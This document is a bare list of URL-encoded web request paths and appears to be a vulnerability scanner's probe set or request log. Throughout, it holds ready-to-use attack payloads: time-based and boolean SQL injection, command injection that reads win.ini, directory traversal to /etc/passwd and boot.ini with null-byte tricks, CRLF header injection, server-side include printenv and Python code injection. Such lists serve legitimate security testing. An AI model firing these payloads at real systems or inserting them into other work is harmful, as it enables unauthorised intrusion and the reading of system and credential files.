[/%0d%0aNeww%3a%20Headerr%0d%0a]
[/%0d%0aNeww%3a%20Headerr]
[/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/%22%20and%20pg_sleep(5)--]
[/%22%20and%20sleep(5)%23]
[/%22%20and%20sleep(5)%3d%22]
[/%22%20or%20pg_sleep(5)--]
[/%22%20or%20sleep(5)%23]
[/%22%20or%20sleep(5)%3d%22]
[/%22%3bimport%20time%3btime.sleep(5)%3b%23]
[/%22%3bimport%20time%3btime.sleep(5)%3b]
[/%22%3bsleep(5)%3b%23]
[/%22%3bsleep(5)%3b]
[/%22%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/%22'%3e%3c!--%23printenv%20--%3e/]
[/%22'%3e%3c!--%23printenv%20--%3e]
[/%22)%20and%20pg_sleep(5)--]
[/%22)%20and%20sleep(5)%3d%22]
[/%22)%20or%20pg_sleep(5)--]
[/%22)%20or%20sleep(5)%3d%22]
[/%22)%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/%22))%20and%20pg_sleep(5)--]
[/%22))%20and%20sleep(5)%3d%22]
[/%22))%20or%20pg_sleep(5)--]
[/%22))%20or%20sleep(5)%3d%22]
[/%22))%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/%3c!--%23printenv%20--%3e/]
[/%3c!--%23printenv%20--%3e]
[/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/%c2%bf'"(]
[/'%20and%20pg_sleep(5)--]
[/'%20and%20sleep(5)%23]
[/'%20and%20sleep(5)%3d']
[/'%20or%20pg_sleep(5)--]
[/'%20or%20sleep(5)%23]
[/'%20or%20sleep(5)%3d']
[/'%3bimport%20time%3btime.sleep(5)%3b%23]
[/'%3bimport%20time%3btime.sleep(5)%3b]
[/'%3bsleep(5)%3b%23]
[/'%3bsleep(5)%3b]
[/'%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/')%20and%20pg_sleep(5)--]
[/')%20and%20sleep(5)%3d']
[/')%20or%20pg_sleep(5)--]
[/')%20or%20sleep(5)%3d']
[/')%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/'))%20and%20pg_sleep(5)--]
[/'))%20and%20sleep(5)%3d']
[/'))%20or%20pg_sleep(5)--]
[/'))%20or%20sleep(5)%3d']
[/'))%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/)%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/))%3bwaitfor%20delay%20'0%3a0%3a5'--]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.html/]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.html]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.jpg/]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.jpg]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.txt/]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.txt]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00/]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd/]
[/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.html/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.html]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.jpg/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.jpg]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.html/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.html]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.jpg/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.jpg]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.txt/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.txt]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini/]
[/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini]
[/1%20and%20pg_sleep(5)--]
[/1%20and%20sleep(5)%23]
[/1%20or%20pg_sleep(5)--]
[/1%20or%20sleep(5)%23]
[/1)%20and%20pg_sleep(5)--]
[/1)%20and%20sleep(5)%23]
[/1)%20or%20pg_sleep(5)--]
[/1)%20or%20sleep(5)%23]
[/1))%20and%20pg_sleep(5)--]
[/1))%20and%20sleep(5)%23]
[/1))%20or%20pg_sleep(5)--]
[/1))%20or%20sleep(5)%23]
[/21%20or%205%3d8--]
[/21%20or%207%3d5--]
[/21%20or%207%3d7--]
[/21%20or%208%3d8--]
[/aa%0d%0aNeww%3a%20Headerr%0d%0a]
[/aa%0d%0aNeww%3a%20Headerr]
[/admin%0auploads%0a/should_not_xist_fffffffffff]
[/admin%0auploads%0a/should_not_xist_ggggggggggg]
[/admin%0auploads%0a/should_not_xist_hhhhhhhhhhh]
[/admin%0auploads%0a/should_not_xist_jjjjjjjjjjjj]
[/admin%0auploads%0a/should_not_xist_llllllllllll]
[/admin%0auploads%0a/should_not_xist_tttttttttttttt]
[/admin%0auploads%0a/should_not_xist_wwwwwwwwwwwwwww]
[/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy]
[/admin%0auploads%0a/]
[/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a]
[/import%20time%3btime.sleep(5)%3b%23]
[/import%20time%3btime.sleep(5)%3b]
[/pg_sleep(5)--]
[/sleep(5)%23]
[/sleep(5)%3b%23]
[/sleep(5)%3b]
[/w'%7c%7c'eb]
[/web%0d%0aNeww%3a%20Headerr%0d%0a]
[/web%0d%0aNeww%3a%20Headerr]
[/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/web%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/web%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/web%22%20and%20%22s%22%3d%22r]
[/web%22%20and%20%22s%22%3d%22s]
[/web%22%20and%20%22t%22%3d%22r]
[/web%22%20and%20%22t%22%3d%22t]
[/web%22%20and%205%3d8--]
[/web%22%20and%207%3d5--]
[/web%22%20and%207%3d7--]
[/web%22%20and%208%3d8--]
[/web%22'%3e%3c!--%23printenv%20--%3e/]
[/web%22'%3e%3c!--%23printenv%20--%3e]
[/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/]
[/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini]
[/web'%20and%20's'%3d'r]
[/web'%20and%20's'%3d's]
[/web'%20and%20't'%3d'r]
[/web'%20and%20't'%3d't]
[/web'%20and%205%3d8--]
[/web'%20and%207%3d5--]
[/web'%20and%207%3d7--]
[/web'%20and%208%3d8--]
[/web/admin%0auploads%0a/should_not_xist_dddddddddd]
[/web/admin%0auploads%0a/should_not_xist_eeeeeeeeeee]
[/web/admin%0auploads%0a/should_not_xist_fffffffffff]
[/web/admin%0auploads%0a/should_not_xist_iiiiiiiiiii]
[/web/admin%0auploads%0a/should_not_xist_kkkkkkkkkkkk]
[/web/admin%0auploads%0a/should_not_xist_qqqqqqqqqqqqq]
[/web/admin%0auploads%0a/should_not_xist_rrrrrrrrrrrrrr]
[/web/admin%0auploads%0a/should_not_xist_vvvvvvvvvvvvvv]
[/web/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy]
[/web/admin%0auploads%0a/]
[/web/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a]
[/webaa%0d%0aNeww%3a%20Headerr%0d%0a]
[/webaa%0d%0aNeww%3a%20Headerr]
[/webxxx%22%20or%20%22s%22%3d%22r]
[/webxxx%22%20or%20%22s%22%3d%22s]
[/webxxx%22%20or%20%22t%22%3d%22r]
[/webxxx%22%20or%20%22t%22%3d%22t]
[/webxxx%22%20or%205%3d8--]
[/webxxx%22%20or%207%3d5--]
[/webxxx%22%20or%207%3d7--]
[/webxxx%22%20or%208%3d8--]
[/webxxx'%20or%20's'%3d'r]
[/webxxx'%20or%20's'%3d's]
[/webxxx'%20or%20't'%3d'r]
[/webxxx'%20or%20't'%3d't]
[/webxxx'%20or%205%3d8--]
[/webxxx'%20or%207%3d5--]
[/webxxx'%20or%207%3d7--]
[/webxxx'%20or%208%3d8--]
